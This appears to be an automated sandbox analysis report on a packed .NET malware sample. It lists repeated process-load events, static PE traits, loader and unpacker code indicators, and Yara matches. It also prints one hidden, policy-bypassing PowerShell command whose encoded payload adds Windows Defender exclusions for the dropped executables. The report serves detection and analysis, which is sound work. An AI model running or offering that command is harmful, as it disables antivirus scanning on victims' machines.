Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: PT54FFSL7ET46RASB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PT54FFSL7ET46RASB.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: PT54FFSL7ET46RASB.exe

Static file information: File size 1319800 > 1048576

Source: PT54FFSL7ET46RASB.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x13f000

Source: PT54FFSL7ET46RASB.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PT54FFSL7ET46RASB.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF419000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF491000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2202638035.000002EAE7500000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF419000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF491000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2202638035.000002EAE7500000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, yTRfYxWiym.exe, 00000005.00000002.2194522749.000002EACECD0000.00000004.08000000.00040000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10626000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000008.00000002.2265321541.0000010E10676000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2765446003.000002D62D80E000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000010.00000002.2757993264.000002D61D324000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: HPd7I3vQri.exe.3.dr, Token.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegAsm.exe.4e8260.2.raw.unpack, Token.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 3.2.RegAsm.exe.436060.0.raw.unpack, ValClassDeSerializer.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: HPd7I3vQri.exe.3.dr, InfoBaseConnector.cs	.Net Code: AssetEvent System.AppDomain.Load(byte[])
Source: 3.2.RegAsm.exe.4e8260.2.raw.unpack, InfoBaseConnector.cs	.Net Code: AssetEvent System.AppDomain.Load(byte[])
Source: 3.2.RegAsm.exe.436060.0.raw.unpack, WrapperVisitorProperty.cs	.Net Code: QueryField System.Reflection.Assembly.Load(byte[])

Suspicious powershell command line found

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQByAGcAdQBtAGUAbgB0AEMAbwB1AG4AdABcAEMAdQByAHIAZQBuAHQALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAZQBuAGcAaQBuAGUAZQByAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABBAHIAZwB1AG0AZQBuAHQAQwBvAHUAbgB0AFwAQwB1AHIAcgBlAG4AdAAuAGUAeABlAA==

Yara detected Costura Assembly Loader

Source: Yara match	File source: 16.2.Current.exe.2d62d5b5b70.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Current.exe.10e10535be0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yTRfYxWiym.exe.2eacd240000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Current.exe.2d62d3b19e0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yTRfYxWiym.exe.2eadf045b38.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Current.exe.2d62d565b38.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Current.exe.2d62d795be0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yTRfYxWiym.exe.2eadf06db70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yTRfYxWiym.exe.2eadf045b38.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.Current.exe.2d62d565b38.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yTRfYxWiym.exe.2eadf275be0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yTRfYxWiym.exe.2eadf315c18.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2193885357.000002EACD240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2265321541.0000010E10535000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2247370156.0000010E00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2198386287.000002EADF275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2198386287.000002EADF315000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2757993264.000002D61D261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2194703677.000002EACED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2765446003.000002D62D795000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2198386287.000002EADF045000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4611134630.0000020880001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2765446003.000002D62D58D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2757993264.000002D61D372000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2765446003.000002D62D3B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2765446003.000002D62D565000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: yTRfYxWiym.exe PID: 764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 3060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 3512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Current.exe PID: 3640, type: MEMORYSTR

Source: HPd7I3vQri.exe.3.dr

Static PE information: 0x9944C62E [Mon Jun 26 19:40:30 2051 UTC]

